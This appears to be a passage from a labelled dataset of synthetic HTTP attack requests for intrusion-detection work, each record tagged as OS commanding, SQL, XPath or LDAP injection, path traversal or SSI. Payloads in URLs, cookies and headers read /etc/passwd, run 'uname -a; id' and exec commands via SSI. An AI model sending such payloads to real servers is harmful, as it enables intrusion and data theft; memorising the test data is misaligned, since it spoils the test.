Accept: image/*;q=0.1, text/*;q=0.4, video/*
Accept-Charset: *;q=0.8
Accept-Encoding: deflate;q=0.3, identity, deflate, gzip;q=0.3
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 167.68.68.243
Cookie: tcfeis47d=noeiG;9eto0=Renbc9;rrmOcedkautD8=me9awls;gMobject5oXR0HR=Oro;autEtaHtynnM2oe=edFz9ahndnem5h;B0wh2kscywttdc=eeb
Cookie2: $Version="47"
Date: Wed, 05 Oct 05 06:53:54 GMT
ETag: W/"LGlAcUQZD9g6TgV2"
Expect: c2dEa
From: eife7@tfrg4tnjm.cz
If-Modified-Since: Sun, 01 Feb 09 16:32:11 UTC
If-Unmodified-Since: Sat, 12 Mar 05 03:51:09 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 10 Jan 05 24:27:15 UTC
Max-Forwards: 174
MIME-Version: 0.1
Pragma: oew3ac=hl
Proxy-Authorization: h80n hmasNo=a0xee
Authorization: Digest opaque="uhen"
Range: -96373
Referer: http://aueeth.gov/s1teaerr/hii3e/ancqtezj.tiff
TE: gzip;q=0.0,deflate;q=0.5
Trailer: From
User-Agent: Mozilla/8.4 (compatible; dm0aaie; Open BSD i386; eihAied)
UA-CPU: Sparc
UA-Disp: 2631,041,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 7262x7113
Via: FTP/0.0 196.51.159.170, t5ode/5.4 www.aIeotEm.jpeg
Transfer-Encoding: deflate
Upgrade: rlwdd/8.0, wre/1.9, b3o/6.7
Warning: 267 www.otmR1ir.htm "emnzR" "Mon, 09 Jun 08 08:56:30 UTC"
X-Forwarded-For: 139.160.46.245
X-Serial-Number: 8565701730547644653
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38405
Start - Id: 43914
class: OsCommanding
GET /cgi-local/alibaba.pl|dir ..\\..\\..\\..\\..\\..\\..\\,? HTTP/1.0
Host: 255.102.40.177:43391
Connection: rngvs
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: casq-t, uYtoy-ee
Cache-Control: no-store
Client-ip: 134.255.20.254
Cookie: lzxi79Lu=systemdene( ;oe;ov4CystyleVul=22
Cookie2: $Version="44"
Date: Sun, 01 Mar 09 13:51:55 GMT
ETag: "m.Xsix2eYp_WcagM1-r"
Expect: slnliT
From: nehsxlsR@ou1hri.fr
If-Modified-Since: Mon, 30 Jun 08 24:48:55 GMT
If-Unmodified-Since: Fri, 04 Jan 08 16:15:09 UTC
If-Match: *
If-None-Match: "s_elzsq_CrI0TpYbO"
If-Range: *
Max-Forwards: 58
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Basic dEFlNm1kMDpoZE9k
Authorization: Basic dHRsYXM6bDJyZHJlY0w=
Range: 6652-,-36477,66590-93
Referer: http://aAic0e.st/no1go.js
TE: trailers,chunked;q=0.3
Trailer: Accept-Language
User-Agent: Mozilla/7.7 (compatible; x7seood; SunOS sun4u; sedfihoe9i; cnduu4; rfsotiigac)
UA-CPU: StrongARM
UA-Disp: 527,703,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 349x5070
Via: HTTP/4.0 50.133.50.36
Transfer-Encoding: etezui; fnoc37q=d0dac
Upgrade: ezwy/1.5, eqeld/8.1, sddee/2.4, yghane/1.4
Warning: 501 123.151.211.66 "eDet3" 
X-Forwarded-For: 206.43.118.58
X-Serial-Number: 83787585359566262
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43914
Start - Id: 36685
class: OsCommanding
GET /dnMRqR_haZxvm2U/htgemtSDNf/sxErwkO2/eDWJA/ThaSelNatEbhto/8C5HDgVNnZE/ttaeirufs2aii7m/YnstylegwIv7r/sO2BIjIg/oodprSclose8/vnaospStheLcejhad.jpg? HTTP/1.1
Host: 51.107.188.249:8
Connection: keep-alive
Accept: text/html, video/*;q=0.6, application/*
Accept-Charset: *;q=0.3
Accept-Encoding: compress, identity;q=0.2, compress, identity;q=0.2, identity
Accept-Language: *;q=0.0
Cache-Control: ehUZ='tqNermoH'
Client-ip: 37.106.91.231
Cookie: 2oncutd0ngeT9=|cat     ../../../../../../../etc/passwd |
Cookie2: $Version="2"
Date: Wed, 16 Aug 06 01:14:47 CET
ETag: "wy@OzR52T2wQnQtS"
Expect: 100-continue
From: lilt@OlQ9nomrvy.gov
If-Modified-Since: Sat, 02 Aug 08 11:04:42 UTC
If-Unmodified-Since: Mon, 27 Apr 09 05:02:37 UTC
If-Match: "s1WSRmdjStb5RvhKL"
If-None-Match: *
If-Range: Tue, 23 Mar 10 15:38:48 UTC
Max-Forwards: 3
Pragma: no-cache
Authorization: Digest nc=fd1AFac9
Range: 54-9,-814311,72-
Referer: /sdeud/6z0xm/ceoftz/osctytl.rar
TE: trailers
User-Agent: Mozilla/2.9 (compatible; MSIE 2.4; Open BSD i386; Onqs)
UA-Disp: 6716,830,16
UA-Pixels: 0658x8272
Via: 9.5 126.57.189.61, FTP/4.5 1.27.31.43:27261, 3.5 www.eiuerhrt.js
Transfer-Encoding: identity
Warning: 690 185.253.94.244 "Garhr" "Tue, 09 Jan 07 24:46:57 UTC"
X-Forwarded-For: 4.27.255.43
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36685
Start - Id: 42943
class: OsCommanding
GET /nsriaar/iAXWhyA8IlQspMkPx/1gi8edZOHNH5Xh6JI/nSg/eZRx@uZb3hB8K_2l/nw1Kln/eRd3obriestaoslhe/fcQbodyDbu4R0d1/sihcr8fced.jpg?UAM0U7oO=4FwlVK.GrFV&4eunjpity9=teicewwo4eg&zv5l5hna=dlihr&noethposy=nUoeSGcKeg HTTP/1.0
Host: www.xnh5y.fr:0474
Connection: yshNuim9
Accept: audio/basic;q=0.8
Accept-Charset: *
Accept-Encoding: ;echo  ; w  ;     uname  -a  ;     id
Accept-Language: *;q=0.6
Cache-Control: uedt=yEllvmi
Cookie: jas6qh9=he ee(v(n;5wTfaAta=pMmLnbodym01e|w;3eeau1eo=a)unph-u
Cookie2: $Version="3"
Date: Thu, 08 Jun 06 19:42:38 GMT
ETag: W/"wXgw0djadFz4HZ4Q1m8"
From: sN6gaeds@i320.fr
If-Unmodified-Since: Mon, 24 Nov 08 02:52:36 GMT
If-None-Match: *
If-Range: Fri, 26 Jan 07 07:49:14 GMT
Max-Forwards: 4623
Pragma: no-cache
Referer: http://sNteaap.de/rtrOgib/slrTf/adf5N.mpeg
User-Agent: dzyKNxfjG http://www.mlikbbea.biz
Via: rcice/0.1 18.67.147.76, HTTP/7.9 111.12.64.12, 1.8 209.202.123.64
Transfer-Encoding: identity
Warning: 546 www.tgrptg.jpeg "ljhi5" 

null

End - Id: 42943
Start - Id: 41375
class: SqlInjection
POST /SylexecitBVNiframeadminKP/9e1treioii9/cwrtrh/rXFJoiNERVJW/moJhtt3R.jpg? HTTP/1.0
Content-Length: 147
Content-Language: tEr,moitil
Content-Encoding: compress
Content-Location: /enloae/deaht6.htm
Content-MD5: MkxlZ2VzdWVNZ3htMXMybw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 23 Dec 08 12:19:46 GMT
Last-Modified: Mon, 31 Jul 06 05:35:08 CET
Host: 28.248.130.123:80
Connection: close
Accept: text/*, video/mpeg
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: waT4b='zl'
Client-ip: 204.103.21.248
Cookie: mg9ehlxch9ul=tii%krMtmbdrope dminH;me=ry2raaxe@1cnneqlEwu;iheooos5=5kucorrr;4aeahsnd3BAc1=mSq-
Cookie2: $Version="6"
Date: Fri, 30 Sep 05 24:13:53 CET
ETag: W/"S6B_y40zLeode_Vwfa"
Expect: Nerh01=hehmt9
From: etwjo@ssads4fhr.it
If-Modified-Since: Sun, 16 Oct 05 11:50:51 UTC
If-Unmodified-Since: Mon, 07 Dec 09 06:06:48 CET
If-Match: "HxGiDB9@4Gw-ZbHh"
If-None-Match: *
If-Range: *
Max-Forwards: 0045
MIME-Version: 2.2
Pragma: rese='cOsc'
Proxy-Authorization: NTLM dG9ub1NydW50OUF5YWJudHluc3RhQnphaHB1d2l6dmFkaTRGdmlobnM=
Authorization: NTLM ZVNkNTFPaGFlb2FOcWo3ZWxycXF1bGhTbjMzYnRPNmc5aWt4bXBFSWVuY3dlb3Vu
Range: 002769-,52-
Referer: http://tdoqTs3v.gov/gLbssm2a.gif
TE: deflate,trailers,chunked
Trailer: Accept-Language
User-Agent: Mozilla/1.4 (compatible; Bemto; Unix; etuh; eb5fUe)
UA-CPU: 68000
UA-Disp: 320,3937,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 2355x6440
Via: 8.8 www.ecrl7ozw.html
Transfer-Encoding: compress
Upgrade: nto/6.6, ero7er/3.3, Axmpf/2.4
Warning: 930 168.40.198.240 "aetrpi0rwwtHsS" 
X-Serial-Number: 102930294622
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

oe9ieyOsn2lu='   union    select     sum(aOfdU) from  dHewesrt--&uninrutaieybdek=EroloiK9uaizRoM&woU0luFxtermGL.=pGpg6Ou&setw9I3auzro=sTaliEn

End - Id: 41375
Start - Id: 45899
class: PathTransversal
GET /iframeMinput3Mq_xp_vnge/_VF/enf/maepleu4ld/lom8r3vin57swtsMtwnm/df1ns/3a/jeetlh/i8YaDNe.bin?it=eon&aegt=aeUp&btanmajiianbhai=e+Fisuhnye7orloc&antshcjea9nna=4&old=7T7oetrenrcp&ni8hatii=..%2F..%2F..%2F..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&AYutQw8=eayZ1umwna HTTP/1.1
Host: www.pcpereo.gov
Connection: close
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: c-tL;q=0.6, aadl-r, o4-tOuh;q=0.9
Cache-Control: only-if-cached
Client-ip: 223.132.160.187
Cookie: atsdtsoybenb=sqoeonjsehe
Cookie2: $Version="32"
Date: Sun, 13 Jun 04 09:43:58 GMT
ETag: "I5Zacwl6TPqEQ2Zm"
Expect: 100-continue
From: hhTi@e5ts.de
If-Modified-Since: Wed, 04 Feb 09 12:20:28 UTC
If-Unmodified-Since: Mon, 08 Mar 10 07:13:44 UTC
If-Match: "DChR2DoxsG6crIf5jM"
If-None-Match: *
If-Range: Tue, 03 May 05 23:11:10 CET
Max-Forwards: 24
MIME-Version: 5.1
Pragma: hrna4=iqt7
Proxy-Authorization: omjasV v1Eoao=notim
Authorization: Digest nc=3A514cE2
Range: 58-182597,4-9
Referer: /E9qt/ofbaasd/lntb/ttrc.jsp
TE: trailers
Trailer: Transfer-Encoding
User-Agent: hbbaw5 http://www.eerd.ch
UA-CPU: StrongARM
UA-Disp: 567,3273,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 1031x814
Via: tdf9t/4.0 214.255.180.225, 8.6 133.118.209.208
Transfer-Encoding: compress
Upgrade: iedr/6.7, enx/4.7
Warning: 813 www.vtuj27.png "rsxiUrrhinfa" "Sun, 10 Aug 08 15:25:17 UTC"
X-Forwarded-For: 30.193.214.158
X-Serial-Number: 447963296121692
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45899
Start - Id: 35843
class: XPathInjection
GET /mvjuFzjVCnEug6D15_qO.html?eltunskhseI=0QqXLr3&elrsyst5emsRd=%28i+%3C+count%28thz0ph%2Fchild%3A%3Atext%28%29%29+++++and++j+%3C+++count%28iltaeh%2Fchild%3A%3Acomment%28%29%29++and+k++++%3C+count%28np%2Fchild%3A%3A*%29++%29&vyncIntemiiN=2nIkgUTt HTTP/1.1
Host: www.o1Diawi4t8.uk
Connection: close
Accept: */*
Accept-Charset: utf-8, windows-1254;q=0.1, x-mac-hebrew, isiri-3342;q=0.2
Accept-Encoding: 
Accept-Language: ccf6-5, bAoAeex-ie, n7i2Fiuy-fpO, ln2a-Or9mfAq;q=0.5
Cache-Control: max-stale=64278
Client-ip: 177.161.53.181
Cookie: HWEW7tmpOmailperlVsock_stream=6384333;lthSegzhsepna=soiLil ;ut=eydxiqhiselectabgsoundko spid;pVY62bznullwOM=yJwoPGnnBE9
Cookie2: $Version="100"
Date: Wed, 10 Oct 07 18:00:18 GMT
ETag: W/"3mul.SL-AHP5nCjiu"
Expect: sc2nG
From: eAhiWa@3utA.st
If-Modified-Since: Tue, 15 Dec 09 22:43:48 CET
If-Unmodified-Since: Wed, 06 Feb 08 17:16:29 CET
If-Match: *
If-None-Match: "Q.FWvqyKcZ9A1-P0qGi"
If-Range: *
Max-Forwards: 885
MIME-Version: 8.2
Pragma: Nr='jxxc'
Proxy-Authorization: do1ee dtreee=is8turnl
Authorization: Digest username="4dg6s4u"
Range: 77-,-9
Referer: /I2rpolo.dll
TE: chunked,deflate;q=0.7
Trailer: Connection
User-Agent: egHe (rmsyCUK@M)
UA-CPU: PowerPC
UA-Disp: 747,476,16
UA-OS: FreeBSD
UA-Pixels: 4135x5853
Via: 9.0 www.rrm6etit.jpg
Transfer-Encoding: identity
Upgrade: ml1/5.5, VeaAtn/8.1, thmg/1.6, lbedtw/3.5
Warning: 327 215.134.162.135 "tumeaatn0ePv5noa" "Fri, 09 Dec 05 05:29:32 UTC"
X-Forwarded-For: 43.11.206.228
X-Serial-Number: 4375504120
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35843
Start - Id: 44741
class: PathTransversal
GET /eresoHhhloTngaets/amtahkl/rkCvyMhzSJe3wo.jpeg?uYstriimldds1yd=6571213&9dt4hH82ilitpb=atdidOtks3group+by%25tlikeloie&iLmtteiEq=%2Fh&iamt5E=sZegc1T&j6Ghttpsstyle=bnbhnoitatTongll8l&jdnnaeysm=file%3A%2F%2F%2Fh%3A%2Fhoaw%2Fit6w%2FtLwuacud.xml HTTP/1.1
Host: 203.114.200.167
Connection: esTq
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.9
Cache-Control: min-fresh=8
Client-ip: 239.84.56.120
Cookie: yswjvo=gZgi7;wclYsnyeeyqreo=i1rtn
Cookie2: $Version="152"
Date: Wed, 04 Aug 04 11:57:04 GMT
ETag: W/"yL4GXeSmQVWeS4c"
Expect: aet1=tb4aTmn6
From: p3teud@syl6D.biz
If-Modified-Since: Wed, 06 Feb 08 05:16:45 GMT
If-Unmodified-Since: Wed, 11 Jun 08 17:16:14 UTC
If-Match: *
If-None-Match: "S-F81SlC_ZZIHC9Pnp"
If-Range: Mon, 29 Sep 08 18:52:22 UTC
Max-Forwards: 8
MIME-Version: 4.7
Pragma: thhhehno=suTi6wo
Authorization: Digest opaque="HanIh"
Range: 218-,38304-
Referer: /3tbN.swf
TE: trailers,deflate;q=0.6,gzip;q=0.1
Trailer: TE
User-Agent: Mozilla/6.0 (X11; U; Open BSD i586 9.8; ul-gi; rv:9.2.6) Gecko/79054825
UA-CPU: 68000
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 7624x8326
Via: Ieukni/7.3 www.Iksh.jpg, FTP/8.6 www.go795Ci.gif, HTTP/7.2 69.246.49.53
Transfer-Encoding: gzip
Upgrade: y9uo/8.1, 6tTo/8.6, sd1ve/9.7, OmipFw/5.0, Xew/1.5
Warning: 438 www.rsk9th.shtml "do9iaoemswqhy" 
X-Forwarded-For: 23.27.136.158
X-Serial-Number: 7113830026427564096
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44741
Start - Id: 36234
class: PathTransversal
GET /.nsf/../notes.ini? HTTP/1.0
Host: www.f45kh.it
Connection: close
Accept: image/*;q=0.1, application/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: oa-l;q=0.6, de5si-1saU9d, ra-9iweiHa, mXro-joi10l3, eca-t
Client-ip: 156.190.62.221
Date: Fri, 24 Apr 09 20:09:18 GMT
If-Modified-Since: Sun, 19 Apr 09 01:09:06 GMT
If-Match: "DwdpGb8mIuZ1GkmaArh"
If-None-Match: *
If-Range: Sun, 10 Aug 08 11:53:23 CET
Referer: /bdxbb/eeemon/e1rui0ol/hdqontvi.jsp
User-Agent: hE1e (m5Er1BmAZ; iG_QvqPd; sPeJi9; imd_XTs)
----: --------------------------

null

End - Id: 36234
Start - Id: 38397
class: LdapInjection
GET /pth/LC6KJkautoexec/rnnrdeMssentEhwg/toesoeq/aapolxanaYp/2ejh/1VXR/q@Sd3ew_zBwxwxyr/a57nnad3gtezp/nF1--Us7ie/o0O.pl?asa6r6d=siz&4onoCueNOnh=a0&enuoabootHe=haEQ.ikKN&ssidelu5ar=2j1_ydsW&ufphvguu=yHllrcpxsotLlldzR&p7yae=1684%29%28%26%28objectClass%3Dsqms%29%28%7C%28sn+%3Daig%29%28cn%3Da+J*%29%29 HTTP/1.0
Host: www.ufIorAOa.org
Connection: keep-alive
Accept: text/*;q=0.7, text/plain;q=0.6, application/zip;q=0.9
Accept-Charset: iso-8859-4;q=0.9, iso-8859-1;q=0.5, iso-8859-15;q=0.8, utf-8
Accept-Encoding: 
Accept-Language: hd-6os;q=0.6, aws3tatt-smertoab, ouWru-aimhlhs;q=0.5
Cache-Control: only-if-cached
Client-ip: 214.154.43.120
Cookie: aetsgn=tGDnr38r@pk;q.3NX=$between;ee7eeanirrdu3wa=20600784
Cookie2: $Version="22"
Date: Tue, 20 Apr 10 09:43:01 GMT
ETag: W/"QfRpXLxEGDTgWWni"
Expect: 100-continue
From: bahiT@etI8o.net
If-Modified-Since: Sat, 17 Mar 07 10:25:49 UTC
If-Unmodified-Since: Wed, 28 Nov 07 13:09:17 GMT
If-Match: *
If-None-Match: "aArLISgjwm7L9c4IRDy"
If-Range: *
Max-Forwards: 022
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: Digest opaque="teJjbis"
Authorization: Digest nc=d7bc844A
Range: -96373
Referer: http://ynareali.fr/rpdatho.tar.gz
TE: deflate
Trailer: Trailer
User-Agent: Mozilla/4.9 (Windows; U; Win98 8.7; iy-ie; rv:0.1.5) Gecko/53072676
UA-CPU: Sparc
UA-Disp: 6597,6108,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 6780x4829
Via: 4.8 88.241.245.135:24, 8.1 108.187.220.135:5
Transfer-Encoding: htsdst; rh9isi=bha5El
Upgrade: rlwdd/8.0, wre/1.9, b3o/6.7
Warning: 267 www.otmR1ir.htm "emnzR" "Mon, 09 Jun 08 08:56:30 UTC"
X-Forwarded-For: 139.160.46.245
X-Serial-Number: 8565701730547644653
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38397
Start - Id: 48433
class: XPathInjection
GET /e0ltsnkrq5ghr7kyonTt/2wPq593K8MemUsq3FH/ll/REadivsHDbD/4JcwqM_zQoxw/xNluccd4a9dmmha/hoIaod/clgZN3Tkeuu/v1OQfbt7SvG5HJaWLex/cnwhlf4rlolAyagt/dnSIFUSg.jpeg? HTTP/1.1
Host: 93.92.88.48
Connection: close
Accept: image/png, text/*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: min-fresh=75302
Client-ip: 123.47.153.54
Cookie: usKhDuiec1n6dsu=&to;p8EeSyz5esErta=aeatepf'   or    1<  r/ie/uhkhA9/child::text()[position()=73]    or 'ed'  =   '
Cookie2: $Version="9"
Date: Wed, 20 Jul 05 12:12:22 CET
ETag: W/"1xV4GK7LTXGJbC."
Expect: Fn4Mtfc=aSut
From: wcqsa@axeAekrt.st
If-Modified-Since: Mon, 02 Oct 06 14:00:32 GMT
If-Unmodified-Since: Tue, 29 Jan 08 07:37:39 CET
If-Match: *
If-None-Match: *
If-Range: "-yBYFqa42JNSlK3"
Max-Forwards: 079
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic bG9ub2g6ZjNlYQ==
Range: 849-343947,4-,-41
Referer: http://3any.biz/hihrac/6izykwn.dll
TE: chunked,trailers,trailers
Trailer: Accept-Language
User-Agent: d6iHYjy http://www.osTBar.de
UA-CPU: 68000
UA-Disp: 4869,244,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 736x8467
Via: FTP/5.1 www.oaHr.png
Transfer-Encoding: wUTao; naDFs6=ahns
Upgrade: 7eaeH/4.4
Warning: 365 193.128.98.208 "ats1" 
X-Forwarded-For: 110.20.49.195
X-Serial-Number: 72505509586520475134
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48433
Start - Id: 40031
class: SSI
GET /kEgrS/ipiusszoze/ab/doywmi1mgfr3atjmof/ahNe1m9/Cbqradkbniotd5/h9dbR.swf?7ygNgtcP6b=%3C%21+++%23%3C%21--+++++%23exec++++cmd%3D%22id%22--%3E&eertcbxry9dS=8&uSetrT=rec&ltfhi=netcataseeedoobge&cbRwp-TXt=d4SlnzkR HTTP/1.1
Host: www.iedterwco.uk
Connection: close
Accept: */*;q=0.3
Accept-Charset: x-mac-roman;q=0.7, iso-10646-ucs-2
Accept-Encoding: *
Accept-Language: leereii-H;q=0.3, todbtmut-unhv;q=0.9, asneo-egma
Cache-Control: no-store
Client-ip: 160.214.20.200
Cookie: denuaajnNhmzm=insertar1zgdntRNi 7ed;7c0Ua0msifzCji=htE ;in=432253
Cookie2: $Version="286"
Date: Mon, 09 Oct 06 23:17:31 GMT
ETag: W/"InT@8Fc@jEaB.CC3M5"
Expect: ness
From: bic3us@lb0or.fr
If-Modified-Since: Fri, 05 Aug 05 01:08:42 GMT
If-Unmodified-Since: Wed, 05 Apr 06 14:11:47 GMT
If-Match: "77d_Pwm.H9OmVXcH0"
If-None-Match: *
If-Range: "RfrkbZu-zGF-iyi"
Max-Forwards: 5
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: Digest username="tsbedo"
Authorization: qywb bisnoeb=nssy
Range: 41683-1312,-3
Referer: /oekaera.avi
TE: deflate;q=0.4,trailers
Trailer: Warning
User-Agent: Mozilla/3.3 (X11; U; Unix 2.7; ir-ap; rv:7.6.6) Gecko/45304527
UA-CPU: Sparc
UA-Disp: 1313,496,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 5394x1347
Via: 1.1 www.ahd42b.css, BIhte/0.9 76.80.83.86:72, HTTP/1.3 www.qiet.tiff
Transfer-Encoding: compress
Upgrade: 9gTeo/9.5
Warning: 794 212.70.161.46 "nC7teHarp0di5fna" 
X-Forwarded-For: 117.150.72.121
X-Serial-Number: 36197
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40031
Start - Id: 49780
class: XPathInjection
GET /pVuqD34.0/dseyoeecifo6dudt/mugcDS-Ol-AYco/aEmQMPTN0n/owFsg/e2/rH/o8OBsghuxVj@qGOnMxPt/o5HfiglsxrxfTTCN/exBHgtwcgzlCQ0.css?BKv_@3andGm=3139+++or++1%3C++hlcsig%2Fooi%2Fis2T%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D366%5D+++++or+++++567%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&nffapit76smGi=e%3Ap&idwo54lnCe=hcoOg2sin&2necel7ttipl=a&tB3e9dwaMreE=591 HTTP/1.1
Host: www.koeW.com
Connection: lvm6
Accept: text/*, image/jpeg;q=0.0
Accept-Charset: windows-1257, iso-8859-8-i, euc-kr, windows-1258;q=0.2, windows-874
Accept-Encoding: deflate
Accept-Language: *
Cache-Control: no-transform
Client-ip: 227.62.139.89
Cookie: bxmailYmvSlS0=wdrimg7etAc($ity
Cookie2: $Version="3"
Date: Sat, 14 Jul 07 22:13:45 UTC
ETag: "JQl-q5Ler@UUd1wq"
Expect: hekfnM
From: 0o1be@Sjeha.org
If-Modified-Since: Sun, 14 Jan 07 14:05:13 CET
If-Unmodified-Since: Thu, 21 Dec 06 24:26:48 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 04 Apr 07 22:13:39 CET
Max-Forwards: 7
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM dHNjYTdselZvczdlcmFyYW9pemlldTZhM2hrZUlnbjZ0RXBnc0lkbmNybTY=
Range: -43159,7-
Referer: /gTvhni/scbtgL/beOEny/eiobdoe/hih5tk.mp3
TE: trailers,trailers
Trailer: Connection
User-Agent: 56gpCmX http://www.hebna.org
UA-CPU: Sparc
UA-Disp: 7451,3171,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 3095x7377
Via: 4.0 255.197.247.125, HTTP/5.4 www.cdma.gif, 6.8 www.aineuf.css
Transfer-Encoding: gzip
Upgrade: reoahn/2.3, btQ7il/2.0, ehd/9.6
Warning: 313 www.rnatjdd.tiff "ikOaheaoton2wee" "Wed, 13 May 09 04:48:39 UTC"
X-Forwarded-For: 203.64.166.11
X-Serial-Number: 5663252755
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49780
Start - Id: 41321
class: SqlInjection
GET /t3eK24SY2U1QCmpwXo_w/ibsEe/n3e5hliadmifAat.htm?nr4jfrhwutopoyd=i5U8xQM3&hiLe4t0eunrxhg=03xaICkau&grs=+y7+3&annn=t3sQjo&4e=2&o0lnfj=T7y&eateotmfs=56&hsrenstIk=0&tdlMOerehnT=rrnlskTuniaSts&63=eU.Rm1_&eeiqIrvulc=t21sno0taetBlr&om=lgog HTTP/1.1
Host: www.epstht.ch
Connection: close
Accept: audio/*, audio/*
Accept-Charset: iso-8859-7, euc-jp, x-mac-icelandic
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: max-age=214
Cookie: hgnt=mhEimttstSlr;ITUMv6position2R=odQzaRydk;dkcgnhroq=' OR ''   =    '
Cookie2: $Version="115"
Date: Sat, 25 Dec 04 07:54:20 UTC
ETag: "OTd0HtIhFN@9vA5Y-4Ke"
Expect: 100-continue
If-Modified-Since: Fri, 10 Sep 04 22:00:40 GMT
If-Unmodified-Since: Tue, 16 Jun 09 19:26:01 GMT
If-Match: "ADdtBQ-fHXj1trrAp"
If-None-Match: "5diRmMPMh.AJzXoFTRf"
If-Range: *
Max-Forwards: 0159
MIME-Version: 0.2
Pragma: dtt='e'
Proxy-Authorization: NTLM YWttaXlyaXJjbk1naVZiM29lc2l5b2wwbmV0dGhlZWU=
Authorization: xeet efdoitte=o7roart
Range: 049933-
Referer: http://www.egxa.uk/rwss.exe
TE: deflate;q=0.4,trailers,trailers
User-Agent: dnet3hg6r
UA-OS: FreeBSD
UA-Pixels: 654x944
Via: HTTP/6.6 3.203.19.151, FTP/4.0 27.211.54.173
Transfer-Encoding: deflate
Upgrade: z7mnyi/7.1, meohI/0.8, eOtfa/4.5, rnyaca/2.1, mina/5.4
Warning: 906 www.C8ogb.jpg "cflnxg4Nltoxcssnedi" 
X-Forwarded-For: 200.57.246.66

null

End - Id: 41321
Start - Id: 37435
class: LdapInjection
GET /nFamlb5m1v3_.asp?pIrexWxu8naseEf=0d%27oceuG&keAconaiyatS=t%29oye&ecbocao3i=36387689 HTTP/1.0
Host: 57.194.118.32:80
Connection: keep-alive
Accept: */*
Accept-Charset: iso-10646-ucs-2;q=0.5, euc-tw
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 90.185.154.16
Cookie: XHKdivh=)(  |   (eauc=ti*)
Cookie2: $Version="7"
Date: Tue, 27 Jun 06 09:43:29 GMT
ETag: W/"MN_sySINsXDW-1mHu"
Expect: 100-continue
From: arSeni@esqqy2etgc.cz
If-Modified-Since: Mon, 10 Apr 06 23:26:49 CET
If-Unmodified-Since: Tue, 25 Oct 05 24:01:17 UTC
If-Match: "FbUpknMip@.VZNd4Ryp8"
If-None-Match: *
If-Range: "HfHY3uak-iWYOu2BB1"
Max-Forwards: 30
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: NTLM bjRpdGJIOWFlczZmdHBubnJvZHJ2ZWVvMXM5bmFuaGlqZW50b2R4Y2Y5OW9jVw==
Authorization: NTLM YmR0VHRnZTh2YmVkRGVzNm5uWGF4dHhyZHJybmhubHJiZW90emQ0cg==
Range: -35593,-698,-52148
Referer: /4vtrw/erfaz/ugea4ite/xensepew.mdb
TE: chunked;q=0.5
Trailer: Accept-Encoding
User-Agent: Mozilla/7.9 (Windows; U; Windows NT 2.3; sa-hn; rv:7.6.3) Gecko/06434384
UA-CPU: 68000
UA-Disp: 7901,3624,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 7873x595
Via: 9.7 7.244.145.93
Transfer-Encoding: verk; cutt3e=lsex
Upgrade: nsi/1.5, ptNi/3.6, ete6l/3.4, Ujnfe/3.1
Warning: 316 149.141.160.251 "ctwienrasegedeheetsm" 
X-Forwarded-For: 22.60.158.248
X-Serial-Number: 662203541237
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 37435
Start - Id: 35407
class: SqlInjection
